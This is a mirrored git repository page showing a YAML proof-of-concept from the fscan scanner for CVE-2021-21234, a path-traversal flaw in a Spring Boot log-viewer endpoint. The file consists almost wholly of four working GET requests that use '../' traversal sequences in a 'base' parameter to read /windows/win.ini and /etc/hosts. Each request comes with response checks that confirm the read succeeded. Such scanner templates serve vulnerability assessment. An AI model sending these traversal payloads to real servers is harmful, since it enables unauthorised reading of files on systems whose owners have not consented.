mirrors/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-07-14 05:12:36 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity
36134b7298
fscan/WebScan/pocs/springboot-cve-2021-21234.yml

23 lines
1.1 KiB
YAML
Raw Blame History

name: poc-yaml-springboot-cve-2021-21234
groups:
spring1:
- method: GET
path: /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts")
spring2:
- method: GET
path: /log/view?filename=/windows/win.ini&base=../../../../../../../../../../
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts")
spring3:
- method: GET
path: /manage/log/view?filename=/etc/hosts&base=../../../../../../../../../../
expression: response.status == 200 && response.body.bcontains(b"127.0.0.1") && response.body.bcontains(b"localhost")
spring4:
- method: GET
path: /log/view?filename=/etc/hosts&base=../../../../../../../../../../
expression: response.status == 200 && response.body.bcontains(b"127.0.0.1") && response.body.bcontains(b"localhost")
detail:
author: iak3ec(https://github.com/nu0l)
links:
- https://mp.weixin.qq.com/s/ZwhBEz2ek26Zf3F-csoRgQ
Reference in New Issue View Git Blame Copy Permalink